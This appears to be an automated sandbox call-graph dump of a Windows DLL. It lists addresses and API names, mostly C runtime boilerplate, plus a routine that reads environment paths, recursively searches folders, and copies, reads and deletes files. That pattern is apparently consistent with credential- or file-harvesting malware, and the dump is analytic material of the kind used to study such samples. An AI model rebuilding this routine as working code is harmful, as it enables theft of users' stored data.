___scrt_release_startup_lock 6377->6378 6381 243947f5 6378->6381 6380 24392448 6382 24394808 6381->6382 6383 24394804 6381->6383 6386 24394815 6382->6386 6383->6380 6387 24395b7a _abort 20 API calls 6386->6387 6390 2439482c 6387->6390 6388 24392ada _ValidateLocalCookies 5 API calls 6389 24394811 6388->6389 6389->6380 6390->6388 5758 24391c5b 5759 24391c6b ___scrt_fastfail 5758->5759 5762 243912ee 5759->5762 5761 24391c87 5763 24391324 ___scrt_fastfail 5762->5763 5764 243913b7 GetEnvironmentVariableW 5763->5764 5788 243910f1 5764->5788 5767 243910f1 57 API calls 5768 24391465 5767->5768 5769 243910f1 57 API calls 5768->5769 5770 24391479 5769->5770 5771 243910f1 57 API calls 5770->5771 5772 2439148d 5771->5772 5773 243910f1 57 API calls 5772->5773 5774 243914a1 5773->5774 5775 243910f1 57 API calls 5774->5775 5776 243914b5 lstrlenW 5775->5776 5777 243914d9 lstrlenW 5776->5777 5787 243914d2 5776->5787 5778 243910f1 57 API calls 5777->5778 5779 24391501 lstrlenW lstrcatW 5778->5779 5780 243910f1 57 API calls 5779->5780 5781 24391539 lstrlenW lstrcatW 5780->5781 5782 243910f1 57 API calls 5781->5782 5783 2439156b lstrlenW lstrcatW 5782->5783 5784 243910f1 57 API calls 5783->5784 5785 2439159d lstrlenW lstrcatW 5784->5785 5786 243910f1 57 API calls 5785->5786 5786->5787 5787->5761 5789 24391118 ___scrt_fastfail 5788->5789 5790 24391129 lstrlenW 5789->5790 5801 24392c40 5790->5801 5793 24391168 lstrlenW 5794 24391177 lstrlenW FindFirstFileW 5793->5794 5795 243911e1 5794->5795 5796 243911a0 5794->5796 5795->5767 5797 243911aa 5796->5797 5798 243911c7 FindNextFileW 5796->5798 5797->5798 5803 24391000 5797->5803 5798->5796 5799 243911da FindClose 5798->5799 5799->5795 5802 24391148 lstrcatW lstrlenW 5801->5802 5802->5793 5802->5794 5804 24391022 ___scrt_fastfail 5803->5804 5805 243910af 5804->5805 5806 2439102f lstrcatW lstrlenW 5804->5806 5807 243910b5 lstrlenW 5805->5807 5818 243910ad 5805->5818 5808 2439106b lstrlenW 5806->5808 5809 2439105a lstrlenW 5806->5809 5834 24391e16 5807->5834 5820 24391e89 lstrlenW 5808->5820 5809->5808 5812 243910ca 5815 24391e89 5 API calls 5812->5815 5812->5818 5813 24391088 GetFileAttributesW 5814 2439109c 5813->5814 5813->5818 5814->5818 5826 2439173a 5814->5826 5817 243910df 5815->5817 5839 243911ea 5817->5839 5818->5797 5821 24392c40 ___scrt_fastfail 5820->5821 5822 24391ea7 lstrcatW lstrlenW 5821->5822 5823 24391ed1 lstrcatW 5822->5823 5824 24391ec2 5822->5824 5823->5813 5824->5823 5825 24391ec7 lstrlenW 5824->5825 5825->5823 5827 24391747 ___scrt_fastfail 5826->5827 5854 24391cca 5827->5854 5830 2439199f 5830->5818 5832 24391824 ___scrt_fastfail _strlen 5832->5830 5874 243915da 5832->5874 5835 24391e29 5834->5835 5837 24391e4c 5834->5837 5836 24391e2d lstrlenW 5835->5836 5835->5837 5836->5837 5838 24391e3f lstrlenW 5836->5838 5837->5812 5838->5837 5840 2439120e ___scrt_fastfail 5839->5840 5841 24391e89 5 API calls 5840->5841 5842 24391220 GetFileAttributesW 5841->5842 5843 24391235 5842->5843 5844 24391246 5842->5844 5843->5844 5846 2439173a 35 API calls 5843->5846 5845 24391e89 5 API calls 5844->5845 5847 24391258 5845->5847 5846->5844 5848 243910f1 56 API calls 5847->5848 5849 2439126d 5848->5849 5850 24391e89 5 API calls 5849->5850 5851 2439127f ___scrt_fastfail 5850->5851 5852 243910f1 56 API calls 5851->5852 5853 243912e6 5852->5853 5853->5818 5855 24391cf1 ___scrt_fastfail 5854->5855 5856 24391d0f CopyFileW CreateFileW 5855->5856 5857 24391d55 GetFileSize 5856->5857 5858 24391d44 DeleteFileW 5856->5858 5859 24391ede 22 API calls 5857->5859 5863 24391808 5858->5863 5860 24391d66 ReadFile 5859->5860 5861 24391d7d CloseHandle DeleteFileW 5860->5861 5862 24391d94 CloseHandle DeleteFileW 5860->5862 5861->5863 5862->5863 5863->5830 5864 24391ede 5863->5864 5866 2439222f 5864->5866 5867 2439224e 5866->5867 5869 24392250 5866->5869 5882 2439474f 5866->5882 5887 243947e5 5866->5887 5867->5832 5870 24392908 5869->5870 5894 243935d2 5869->5894 5871 243935d2 __CxxThrowException@8 RaiseException 5870->5871 5873 24392925 5871->5873 5873->5832 5875 2439160c _strcat _strlen 5874->5875 5876 2439163c lstrlenW 5875->5876 5982 24391c9d 5876->5982 5878 24391655 lstrcatW lstrlenW 5879 24391678 5878->5879 5880 2439167e lstrcatW 5879->5880 5881 24391693 ___scrt_fastfail 5879->5881 5880->5881 5881->5832 5897 24394793 5882->5897 5885 2439478f 5885->5866 5886 24394765 5903 24392ada 5886->5903 5892 243956d0 _abort 5887->5892 5888 2439570e 5916 24396368 5888->5916 5890 243956f9 RtlAllocateHeap 5891 2439570c 5890->5891 5890->5892 5891->5866 5892->5888 5892->5890 5893 2439474f _abort 7 API calls 5892->5893 5893->5892 5895 243935f2 RaiseException 5894->5895 5895->5870 5898 2439479f ___scrt_is_nonwritable_in_current_image 5897->5898 5910 24395671 RtlEnterCriticalSection 5898->5910 5900 243947aa 5911 243947dc 5900->5911 5902 243947d1 _abort 5902->5886 5904 24392ae3 5903->5904 5905 24392ae5 IsProcessorFeaturePresent 5903->5905 5904->5885 5907 24392b58 5905->5907 5915 24392b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5907->5915 5909 24392c3b 5909->5885 5910->5900 5914 243956b9 RtlLeaveCriticalSection 5911->5914 5913 243947e3 5913->5902 5914->5913 5915->5909 5919 24395b7a GetLastError 5916->5919 5920 24395b99 5919->5920 5921 24395b93 5919->5921 5925 24395bf0 SetLastError 5920->5925 5945 2439637b 5920->5945 5938 24395e08 5921->5938 5927 24395bf9 5925->5927 5926 24395bb3 5952 2439571e 5926->5952 5927->5891 5931 24395bcf 5965 2439593c 5931->5965 5932 24395bb9 5934 24395be7 SetLastError 5932->5934 5934->5927 5936 2439571e _free 17 API calls 5937 24395be0 5936->5937 5937->5925 5937->5934 5970 24395c45 5938->5970 5940 24395e2f 5941 24395e47 TlsGetValue 5940->5941 5942 24395e3b 5940->5942 5941->5942 5943 24392ada _ValidateLocalCookies 5 API calls 5942->5943 5944 24395e58 5943->5944 5944->5920 5948 24396388 _abort 5945->5948 5946 243963c8 5950 24396368 __dosmaperr 19 API calls 5946->5950 5947 243963b3 RtlAllocateHeap 5947->5948 5949 24395bab 5947->5949 5948->5946 5948->5947 5951 2439474f _abort 7 API calls 5948->5951 5949->5926 5958 24395e5e 5949->5958 5950->5949 5951->5948 5953 24395729 HeapFree 5952->5953 5954 24395752 __dosmaperr 5952->5954 5953->5954 5955 2439573e 5953->5955 5954->5932 5956 24396368 __dosmaperr 18 API calls 5955->5956 5957 24395744 GetLastError 5956->5957 5957->5954 5959 24395c45 _abort 5 API calls 5958->5959 5960 24395e85 5959->5960 5961 24395ea0 TlsSetValue 5960->5961 5963 24395e94 5960->5963 5961->5963 5962 24392ada _ValidateLocalCookies 5 API calls 5964 24395bc8 5962->5964 5963->5962 5964->5926 5964->5931 5976 24395914 5965->5976 5971 24395c71 5970->5971 5972 24395c75 __crt_fast_encode_pointer 5970->5972 5971->5972 5973 24395ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5971->5973 5974 24395c95 5971->5974 5972->5940 5973->5971 5974->5972 5975 24395ca1 GetProcAddress 5974->5975 5975->5972 5977 24395854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 5976->5977 5978 24395938 5977->5978 5979 243958c4 5978->5979 5980 24395758 _abort 20 API calls 5979->5980 5981 243958e8 5980->5981 5981->5936 5983 24391ca6 _strlen 5982->5983 5983->5878 7370 243920db 7372 243920e7 ___scrt_is_nonwritable_in_current_image 7370->7372 7371 24392110 dllmain_raw 7373 2439212a 7371->7373 7381 243920f6 7371->7381 7372->7371 7377 2439210b 7372->7377 7372->7381 7383 24391eec 7373->7383 7375 24392177 7376 24391eec 31 API calls 7375->7376 7375->7381 7378 2439218a 7376->7378 7377->7375 7380 24391eec 31 API calls 7377->7380 7377->7381 7379 24392193 dllmain_raw 7378->7379 7378->7381 7379->7381 7382 2439216d dllmain_raw 7380->7382 7382->7375 7384 24391f2a dllmain_crt_process_detach 7383->7384 7385 24391ef7 7383->7385 7390 24391f06 7384->7390 7386 24391f1c dllmain_crt_process_attach 7385->7386 7387 24391efc 7385->7387 7386->7390 7388 24391f01 7387->7388 7389 24391f12 7387->7389 7388->7390 7393 2439240b 7388->7393 7398 243923ec 7389->7398 7390->7377 7406 243953e5 7393->7406 7527 24393513 7398->7527 7403 24392408 7403->7390 7404 2439351e 7 API calls 7405 243923f5 7404->7405 7405->7390 7412 24395aca 7406->7412 7409 2439351e 7516 24393820 7409->7516 7411 24392415 7411->7390 7413 24395ad4 7412->7413 7416 24392410 7412->7416 7414 24395e08 _abort 11 API calls 7413->7414 7415 24395adb 7414->7415 7415->7416 7417 24395e5e _abort 11 API calls 7415->7417 7416->7409 7418 24395aee 7417->7418 7420 243959b5 7418->7420 7421 243959c0 7420->7421 7422 243959d0 7420->7422 7426 243959d6 7421->7426 7422->7416 7425 2439571e _free 20 API calls 7425->7422 7427 243959e9 7426->7427 7428 243959ef 7426->7428 7430 2439571e _free 20 API calls 7427->7430 7429 2439571e _free 20 API calls 7428->7429 7431 243959fb 7429->7431 7430->7428 7432 2439571e _free 20 API calls 7431->7432 7433 24395a06 7432->7433 7434 2439571e _free 20 API calls 7433->7434 7435 24395a11 7434->7435 7436 2439571e _free 20 API calls 7435->7436 7437 24395a1c 7436->7437 7438 2439571e _free 20 API calls 7437->7438 7439 24395a27 7438->7439 7440 2439571e _free 20 API calls 7439->7440 7441 24395a32 7440->7441 7442 2439571e _free 20 API calls 7441->7442 7443 24395a3d 7442->7443 7444 2439571e _free 20 API calls 7443->7444 7445 24395a48 7444->7445 7446 2439571e _free 20 API calls 7445->7446 7447 24395a56 7446->7447 7452 2439589c 7447->7452 7458 243957a8 7452->7458 7454 243958c0 7455 243958ec 7454->7455 7471 24395809 7455->7471 7457 24395910 7457->7425 7459 243957b4 ___scrt_is_nonwritable_in_current_image 7458->7459 7466 24395671 RtlEnterCriticalSection 7459->7466 7461 243957e8 7467 243957fd 7461->7467 7463 243957be 7463->7461 7464 2439571e _free 20 API calls 7463->7464 7464->7461 7465 243957f5 _abort 7465->7454 7466->7463 7470 243956b9 RtlLeaveCriticalSection 7467->7470 7469 24395807 7469->7465 7470->7469 7472 24395815 ___scrt_is_nonwritable_in_current_image 7471->7472 7479 24395671 RtlEnterCriticalSection 7472->7479 7474 2439581f 7480 24395a7f 7474->7480 7476 24395832 7484 24395848 7476->7484 7478 24395840 _abort 7478->7457 7479->7474 7481 24395ab5 __fassign 7480->7481 7482 24395a8e __fassign 7480->7482 7481->7476 7482->7481 7487 24397cc2 7482->7487 7515 243956b9 RtlLeaveCriticalSection 7484->7515 7486 24395852 7486->7478 7489 24397d42 7487->7489 7490 24397cd8 7487->7490 7488 24397e35 __fassign 20 API calls 7491 24397d9e 7488->7491 7492 2439571e _free 20 API calls 7489->7492 7514 24397d90 7489->7514 7490->7489 7496 2439571e _free 20 API calls 7490->7496 7497 24397d0b 7490->7497 7500 24397dfe 7491->7500 7511 2439571e 20 API calls _free 7491->7511 7493 24397d64 7492->7493 7494 2439571e _free 20 API calls 7493->7494 7498 24397d77 7494->7498 7495 2439571e _free 20 API calls 7499 24397d37 7495->7499 7501 24397d00 7496->7501 7502 2439571e _free 20 API calls 7497->7502 7513 24397d2d 7497->7513 7503 2439571e _free 20 API calls 7498->7503 7504 2439571e _free 20 API calls 7499->7504 7505 2439571e _free 20 API calls 7500->7505 7506 243990ba ___free_lconv_mon 20 API calls 7501->7506 7507 24397d22 7502->7507 7508 24397d85 7503->7508 7504->7489 7512 24397e04 7505->7512 7506->7497 7509 243991b8 __fassign 20 API calls 7507->7509 7510 2439571e _free 20 API calls 7508->7510 7509->7513 7510->7514 7511->7491 7512->7481 7513->7495 7514->7488 7515->7486 7517 2439384b ___vcrt_freefls@4 7516->7517 7519 2439382d 7516->7519 7517->7411 7518 2439383b 7521 24393ba2 ___vcrt_FlsSetValue 6 API calls 7518->7521 7519->7518 7522 24393b67 7519->7522 7521->7517 7523 24393a82 try_get_function 5 API calls 7522->7523 7524 24393b81 7523->7524 7525 24393b99 TlsGetValue 7524->7525 7526 24393b8d 7524->7526 7525->7526 7526->7518 7533 24393856 7527->7533 7529 243923f1 7529->7405 7530 243953da 7529->7530 7531 24395b7a _abort 20 API calls 7530->7531 7532 243923fd 7531->7532 7532->7403 7532->7404 7534 2439385f 7533->7534 7535 24393862 GetLastError 7533->7535 7534->7529 7536 24393b67 ___vcrt_FlsGetValue 6 API calls 7535->7536 7537 24393877 7536->7537 7538 243938dc SetLastError 7537->7538 7539 24393ba2 ___vcrt_FlsSetValue 6 API calls 7537->7539 7544 24393896 7537->7544 7538->7529 7540 24393890 7539->7540 7541 243938b8 7540->7541 7542 24393ba2 ___vcrt_FlsSetValue 6 API calls 7540->7542 7540->7544 7543 24393ba2 ___vcrt_FlsSetValue 6 API calls 7541->7543 7541->7544 7542->7541 7543->7544 7544->7538 7120 24394a9a 7121 24395411 38 API calls 7120->7121 7122 24394aa2 7121->7122 7545 24394bdd 7546 24394c08 7545->7546 7547 24394bec 7545->7547 7549 24396d60 51 API calls 7546->7549 7547->7546 7548 24394bf2 7547->7548 7550 24396368 __dosmaperr 20 API calls 7548->7550 7551 24394c0f GetModuleFileNameA 7549->7551 7552 24394bf7 7550->7552 7553 24394c33 7551->7553 7554 243962ac _abort 26 API calls 7552->7554 7568 24394d01 7553->7568 7556 24394c01 7554->7556 7558 24394e76 20 API calls 7559 24394c5d 7558->7559 7560 24394c72 7559->7560 7561 24394c66 7559->7561 7563 24394d01 38 API calls 7560->7563 7562 24396368 __dosmaperr 20 API calls 7561->7562 7567 24394c6b 7562->7567 7565 24394c88 7563->7565 7564 2439571e _free 20 API calls 7564->7556 7566 2439571e _free 20 API calls 7565->7566 7565->7567 7566->7567 7567->7564 7570 24394d26 7568->7570 7572 24394d86 7570->7572 7574 243970eb 7570->7574 7571 24394c50 7571->7558 7572->7571 7573 243970eb 38 API calls 7572->7573 7573->7572 7577 24397092 7574->7577 7578 243954a7 __fassign 38 API calls 7577->7578 7579 243970a6 7578->7579 7579->7570 6391 2439281c 6394 24392882 6391->6394 6397 24393550 6394->6397 6396 2439282a 6398 2439358a 6397->6398 6399 2439355d 6397->6399 6398->6396 6399->6398 6399->6399 6400 243947e5 ___std_exception_copy 21 API calls 6399->6400 6401 2439357a 6400->6401 6401->6398 6403 2439544d 6401->6403 6404 24395468 6403->6404 6405 2439545a 6403->6405 6406 24396368 __dosmaperr 20 API calls 6404->6406 6405->6404 6408 2439547f 6405->6408 6411 24395470 6406->6411 6407 243962ac _abort 26 API calls 6409 2439547a 6407->6409 6408->6409 6410 24396368 __dosmaperr 20 API calls 6408->6410 6409->6398 6410->6411 6411->6407 6520 24395351 6521 24395374 6520->6521 6522 24395360 6520->6522 6523 2439571e _free 20 API calls 6521->6523 6522->6521 6524 2439571e _free 20 API calls 6522->6524 6525 24395386 6523->6525 6524->6521 6526 2439571e _free 20 API calls 6525->6526 6527 24395399 6526->6527 6528 2439571e _free 20 API calls 6527->6528 6529 243953aa 6528->6529 6530 2439571e _free 20 API calls 6529->6530 6531 243953bb 6530->6531 7123 24393c90 RtlUnwind 7580 243936d0 7581 243936e2 7580->7581 7582 243936f0 @_EH4_CallFilterFunc@8 7580->7582 7583 24392ada _ValidateLocalCookies 5 API calls 7581->7583 7583->7582 7584 243973d5 7585 243973e1 ___scrt_is_nonwritable_in_current_image 7584->7585 7596 24395671 RtlEnterCriticalSection 7585->7596 7587 243973e8 7597 24398be3 7587->7597 7589 243973f7 7590 24397406 7589->7590 7610 24397269 GetStartupInfoW 7589->7610 7621 24397422 7590->7621 7593 24397417 _abort 7596->7587 7598 24398bef ___scrt_is_nonwritable_in_current_image 7597->7598 7599 24398bfc 7598->7599 7600 24398c13 7598->7600 7601 24396368 __dosmaperr 20 API calls 7599->7601 7624 24395671 RtlEnterCriticalSection 7600->7624 7604 24398c01 7601->7604 7603 24398c1f 7609 24398c4b 7603->7609 7625 24398b34 7603->7625 7605 243962ac _abort 26 API calls 7604->7605 7606 24398c0b _abort 7605->7606 7606->7589 7632 24398c72 7609->7632 7611 24397318 7610->7611 7612 24397286 7610->7612 7616 2439731f 7611->7616 7612->7611 7613 24398be3 27 API calls 7612->7613 7614 243972af 7613->7614 7614->7611 7615 243972dd GetFileType 7614->7615 7615->7614 7619 24397326 7616->7619 7617 24397369 GetStdHandle 7617->7619 7618 243973d1 7618->7590 7619->7617 7619->7618 7620 2439737c GetFileType 7619->7620 7620->7619 7636 243956b9 RtlLeaveCriticalSection 7621->7636 7623 24397429 7623->7593 7624->7603 7626 2439637b _abort 20 API calls 7625->7626 7627 24398b46 7626->7627 7630 24395eb7 11 API calls 7627->7630 7631 24398b53 7627->7631 7628 2439571e _free 20 API calls 7629 24398ba5 7628->7629 7629->7603 7630->7627 7631->7628 7635 243956b9 RtlLeaveCriticalSection 7632->7635 7634 24398c79 7634->7606 7635->7634 7636->7623 7637 24394ed7 7638 24396d60 51 API calls 7637->7638 7639 24394ee9 7638->7639 7648 24397153 GetEnvironmentStringsW 7639->7648 7642 24394ef4 7644 2439571e _free 20 API calls 7642->7644 7645 24394f29 7644->7645 7646 24394eff 7647 2439571e _free 20 API calls 7646->7647 7647->7642 7649 2439716a 7648->7649 7659 243971bd 7648->7659 7652 24397170 WideCharToMultiByte 7649->7652 7650 24394eee 7650->7642 7660 24394f2f 7650->7660 7651 243971c6 FreeEnvironmentStringsW 7651->7650 7653 2439718c 7652->7653 7652->7659 7654 243956d0 21 API calls 7653->7654 7655 24397192 7654->7655 7656 24397199 WideCharToMultiByte 7655->7656 7657 243971af 7655->7657 7656->7657 7658 2439571e _free 20 API calls 7657->7658 7658->7659 7659->7650 7659->7651 7661 24394f44 7660->7661 7662 2439637b _abort 20 API calls 7661->7662 7672 24394f6b 7662->7672 7663 24394fcf 7664 2439571e _free 20 API calls 7663->7664 7665 24394fe9 7664->7665 7665->7646 7666 2439637b _abort 20 API calls 7666->7672 7667 24394fd1 7669 24395000 20 API calls 7667->7669 7668 2439544d ___std_exception_copy 26 API calls 7668->7672 7670 24394fd7 7669->7670 7673 2439571e _free 20 API calls 7670->7673 7671 24394ff3 7674 243962bc _abort 11 API calls 7671->7674 7672->7663 7672->7666 7672->7667 7672->7668 7672->7671 7675 2439571e _free 20 API calls 7672->7675 7673->7663 7676 24394fff 7674->7676 7675->7672 6532 24392049 6533 24392055 ___scrt_is_nonwritable_in_current_image 6532->6533 6534 2439207d 6533->6534 6535 243920d3 6533->6535 6545 2439205e 6533->6545 6546 2439244c 6534->6546 6536 24392639 ___scrt_fastfail 4 API calls 6535->6536 6538 243920da 6536->6538 6539 24392082 6555 24392308 6539->6555 6541 24392087 __RTC_Initialize 6558 243920c4 6541->6558 6543 2439209f 6561 2439260b 6543->6561 6547 24392451 ___scrt_release_startup_lock 6546->6547 6548 24392455 6547->6548 6552 24392461 6547->6552 6549 2439527a _abort 20 API calls 6548->6549 6550 2439245f 6549->6550 6550->6539 6551 2439246e 6551->6539 6552->6551 6553 2439499b _abort 28 API calls 6552->6553 6554 24394bbd 6553->6554 6554->6539 6567 243934c7 RtlInterlockedFlushSList 6555->6567 6557 24392312 6557->6541 6569 2439246f 6558->6569 6560 243920c9 ___scrt_release_startup_lock 6560->6543 6562 24392617 6561->6562 6566 2439262d 6562->6566 6588 243953ed 6562->6588 6565 24393529 ___vcrt_uninitialize 8 API calls 6565->6566 6566->6545 6568 243934d7 6567->6568 6568->6557 6574 243953ff 6569->6574 6572 2439391b ___vcrt_uninitialize_ptd 6 API calls 6573 2439354d 6572->6573 6573->6560 6577 24395c2b 6574->6577 6578 24392476 6577->6578 6579 24395c35 6577->6579 6578->6572 6581 24395db2 6579->6581 6582 24395c45 _abort 5 API calls 6581->6582 6583 24395dd9 6582->6583 6584 24395df1 TlsFree 6583->6584 6585 24395de5 6583->6585 6584->6585 6586 24392ada _ValidateLocalCookies 5 API calls 6585->6586 6587 24395e02 6586->6587 6587->6578 6591 243974da 6588->6591 6593 243974f3 6591->6593 6592 24392ada _ValidateLocalCookies 5 API calls 6594 24392625 6592->6594 6593->6592 6594->6565 7124 24398a89 7127 24396d60 7124->7127 7128 24396d69 7127->7128 7129 24396d72 7127->7129 7131 24396c5f 7128->7131 7132 24395af6 _abort 38 API calls 7131->7132 7133 24396c6c 7132->7133 7134 24396d7e __fassign 38 API calls 7133->7134 7135 24396c74 7134->7135 7151 243969f3 7135->7151 7138 243956d0 21 API calls 7139 24396c9c 7138->7139 7150 24396cce 7139->7150 7158 24396e20 7139->7158 7141 2439571e _free 20 API calls 7144 24396c8b 7141->7144 7143 24396cc9 7145 24396368 __dosmaperr 20 API calls 7143->7145 7144->7129 7145->7150 7146 24396d12 7146->7150 7168 243968c9 7146->7168 7147 24396ce6 7147->7146 7148 2439571e _free 20 API calls 7147->7148 7148->7146 7150->7141 7152 243954a7 __fassign 38 API calls 7151->7152 7153 24396a05 7152->7153 7154 24396a14 GetOEMCP 7153->7154 7155 24396a26 7153->7155 7156 24396a3d 7154->7156 7155->7156 7157 24396a2b GetACP 7155->7157 7156->7138 7156->7144 7157->7156 7159 243969f3 40 API calls 7158->7159 7161 24396e3f 7159->7161 7160 24396e46 7163 24392ada _ValidateLocalCookies 5 API calls 7160->7163 7161->7160 7162 24396eb5 ___scrt_fastfail 7161->7162 7165 24396e90 IsValidCodePage 7161->7165 7171 24396acb GetCPInfo 7162->7171 7164 24396cc1 7163->7164 7164->7143 7164->7147 7165->7160 7166 24396ea2 GetCPInfo 7165->7166 7166->7160 7166->7162 7244 24396886 7168->7244 7170 243968ed 7170->7150 7172 24396baf 7171->7172 7173 24396b05 7171->7173 7176 24392ada _ValidateLocalCookies 5 API calls 7172->7176 7181 243986e4 7173->7181 7178 24396c5b 7176->7178 7178->7160 7180 24398a3e 43 API calls 7180->7172 7182 243954a7 __fassign 38 API calls 7181->7182 7183 24398704 MultiByteToWideChar 7182->7183 7185 24398742 7183->7185 7193 243987da 7183->7193 7186 24398763 ___scrt_fastfail 7185->7186 7189 243956d0 21 API calls 7185->7189 7188 243987d4 7186->7188 7192 243987a8 MultiByteToWideChar 7186->7192 7187 24392ada _ValidateLocalCookies 5 API calls 7190 24396b66 7187->7190 7200 24398801 7188->7200 7189->7186 7195 24398a3e 7190->7195 7192->7188 7194 243987c4 GetStringTypeW 7192->7194 7193->7187 7194->7188 7196 243954a7 __fassign 38 API calls 7195->7196 7197 24398a51 7196->7197 7204 24398821 7197->7204 7201 2439880d 7200->7201 7202 2439881e 7200->7202 7201->7202 7203 2439571e _free 20 API calls 7201->7203 7202->7193 7203->7202 7206 2439883c 7204->7206 7205 24398862 MultiByteToWideChar 7207 24398a16 7205->7207 7208 2439888c 7205->7208 7206->7205 7209 24392ada _ValidateLocalCookies 5 API calls 7207->7209 7213 243956d0 21 API calls 7208->7213 7215 243988ad 7208->7215 7210 24396b87 7209->7210 7210->7180 7211 24398962 7217 24398801 __freea 20 API calls 7211->7217 7212 243988f6 MultiByteToWideChar 7212->7211 7214 2439890f 7212->7214 7213->7215 7231 24395f19 7214->7231 7215->7211 7215->7212 7217->7207 7219 24398939 7219->7211 7222 24395f19 11 API calls 7219->7222 7220 24398971 7221 243956d0 21 API calls 7220->7221 7225 24398992 7220->7225 7221->7225 7222->7211 7223 24398a07 7224 24398801 __freea 20 API calls 7223->7224 7224->7211 7225->7223 7226 24395f19 11 API calls 7225->7226 7227 243989e6 7226->7227 7227->7223 7228 243989f5 WideCharToMultiByte 7227->7228 7228->7223 7229 24398a35 7228->7229 7230 24398801 __freea 20 API calls 7229->7230 7230->7211 7232 24395c45 _abort 5 API calls 7231->7232 7233 24395f40 7232->7233 7235 24395f49 7233->7235 7239 24395fa1 7233->7239 7237 24392ada _ValidateLocalCookies 5 API calls 7235->7237 7238 24395f9b 7237->7238 7238->7211 7238->7219 7238->7220 7240 24395c45 _abort 5 API calls 7239->7240 7241 24395fc8 7240->7241 7242 24392ada _ValidateLocalCookies 5 API calls 7241->7242 7243 24395f89 LCMapStringW 7242->7243 7243->7235 7245 24396892 ___scrt_is_nonwritable_in_current_image 7244->7245 7252 24395671 RtlEnterCriticalSection 7245->7252 7247 2439689c 7253 243968f1 7247->7253 7251 243968b5 _abort 7251->7170 7252->7247 7265 24397011 7253->7265 7255 2439693f 7256 24397011 26 API calls 7255->7256 7257 2439695b 7256->7257 7258 24397011 26 API calls 7257->7258 7259 24396979 7258->7259 7260 243968a9 7259->7260 7261 2439571e _free 20 API calls 7259->7261 7262 243968bd 7260->7262 7261->7260 7279 243956b9 RtlLeaveCriticalSection 7262->7279 7264 243968c7 7264->7251 7266 24397022 7265->7266 7270 2439701e 7265->7270 7267 24397029 7266->7267 7272 2439703c ___scrt_fastfail 7266->7272 7268 24396368 __dosmaperr 20 API calls 7267->7268 7269 2439702e 7268->7269 7271 243962ac _abort 26 API calls 7269->7271 7270->7255 7271->7270 7272->7270 7273 2439706a 7272->7273 7274 24397073 7272->7274 7275 24396368 __dosmaperr 20 API calls 7273->7275 7274->7270 7277 24396368 __dosmaperr 20 API calls 7274->7277 7276 2439706f 7275->7276 7278 243962ac _abort 26 API calls 7276->7278 7277->7276 7278->7270 7279->7264 6595 24395348 6596 24393529 ___vcrt_uninitialize 8 API calls 6595->6596 6597 2439534f 6596->6597 6598 24397b48 6608 24398ebf 6598->6608 6602 24397b55 6621 2439907c 6602->6621 6605 24397b7f 6606 2439571e _free 20 API calls 6605->6606 6607 24397b8a 6606->6607 6625 24398ec8 6608->6625 6610 24397b50 6611 24398fdc 6610->6611 6612 24398fe8 ___scrt_is_nonwritable_in_current_image 6611->6612 6645 24395671 RtlEnterCriticalSection 6612->6645 6614 2439905e 6659 24399073 6614->6659 6615 24398ff3 6615->6614 6617 24399032 RtlDeleteCriticalSection 6615->6617 6646 2439a09c 6615->6646 6620 2439571e _free 20 API calls 6617->6620 6618 2439906a _abort 6618->6602 6620->6615 6622 24399092 6621->6622 6623 24397b64 RtlDeleteCriticalSection 6621->6623 6622->6623 6624 2439571e _free 20 API calls 6622->6624 6623->6602 6623->6605 6624->6623 6626 24398ed4 ___scrt_is_nonwritable_in_current_image 6625->6626 6635 24395671 RtlEnterCriticalSection 6626->6635 6628 24398f77 6640 24398f97 6628->6640 6631 24398f83 _abort 6631->6610 6633 24398e78 66 API calls 6634 24398ee3 6633->6634 6634->6628 6634->6633 6636 24397b94 RtlEnterCriticalSection 6634->6636 6637 24398f6d 6634->6637 6635->6634 6636->6634 6643 24397ba8 RtlLeaveCriticalSection 6637->6643 6639 24398f75 6639->6634 6644 243956b9 RtlLeaveCriticalSection 6640->6644 6642 24398f9e 6642->6631 6643->6639 6644->6642 6645->6615 6647 2439a0a8 ___scrt_is_nonwritable_in_current_image 6646->6647 6648 2439a0b9 6647->6648 6649 2439a0ce 6647->6649 6650 24396368 __dosmaperr 20 API calls 6648->6650 6658 2439a0c9 _abort 6649->6658 6662 24397b94 RtlEnterCriticalSection 6649->6662 6652 2439a0be 6650->6652 6654 243962ac _abort 26 API calls 6652->6654 6653 2439a0ea 6663 2439a026 6653->6663 6654->6658 6656 2439a0f5 6679 2439a112 6656->6679 6658->6615 6943 243956b9 RtlLeaveCriticalSection 6659->6943 6661 2439907a 6661->6618 6662->6653 6664 2439a033 6663->6664 6666 2439a048 6663->6666 6665 24396368 __dosmaperr 20 API calls 6664->6665 6667 2439a038 6665->6667 6671 2439a043 6666->6671 6682 24398e12 6666->6682 6669 243962ac _abort 26 API calls 6667->6669 6669->6671 6671->6656 6672 2439907c 20 API calls 6673 2439a064 6672->6673 6688 24397a5a 6673->6688 6675 2439a06a 6695 2439adce 6675->6695 6678 2439571e _free 20 API calls 6678->6671 6942 24397ba8 RtlLeaveCriticalSection 6679->6942 6681 2439a11a 6681->6658 6683 24398e2a 6682->6683 6687 24398e26 6682->6687 6684 24397a5a 26 API calls 6683->6684 6683->6687 6685 24398e4a 6684->6685 6710 24399a22 6685->6710 6687->6672 6689 24397a7b 6688->6689 6690 24397a66 6688->6690 6689->6675 6691 24396368 __dosmaperr 20 API calls 6690->6691 6692 24397a6b 6691->6692 6693 243962ac _abort 26 API calls 6692->6693 6694 24397a76 6693->6694 6694->6675 6696 2439addd 6695->6696 6697 2439adf2 6695->6697 6698 24396355 __dosmaperr 20 API calls 6696->6698 6699 2439ae2d 6697->6699 6703 2439ae19 6697->6703 6700 2439ade2 6698->6700 6701 24396355 __dosmaperr 20 API calls 6699->6701 6702 24396368 __dosmaperr 20 API calls 6700->6702 6704 2439ae32 6701->6704 6708 2439a070 6702->6708 6899 2439ada6 6703->6899 6705 24396368 __dosmaperr 20 API calls 6704->6705 6707 2439ae3a 6705->6707 6709 243962ac _abort 26 API calls 6707->6709 6708->6671 6708->6678 6709->6708 6711 24399a2e ___scrt_is_nonwritable_in_current_image 6710->6711 6712 24399a4e 6711->6712 6713 24399a36 6711->6713 6714 24399aec 6712->6714 6719 24399a83 6712->6719 6735 24396355 6713->6735 6716 24396355 __dosmaperr 20 API calls 6714->6716 6718 24399af1 6716->6718 6721 24396368 __dosmaperr 20 API calls 6718->6721 6738 24398c7b RtlEnterCriticalSection 6719->6738 6720 24396368 __dosmaperr 20 API calls 6729 24399a43 _abort 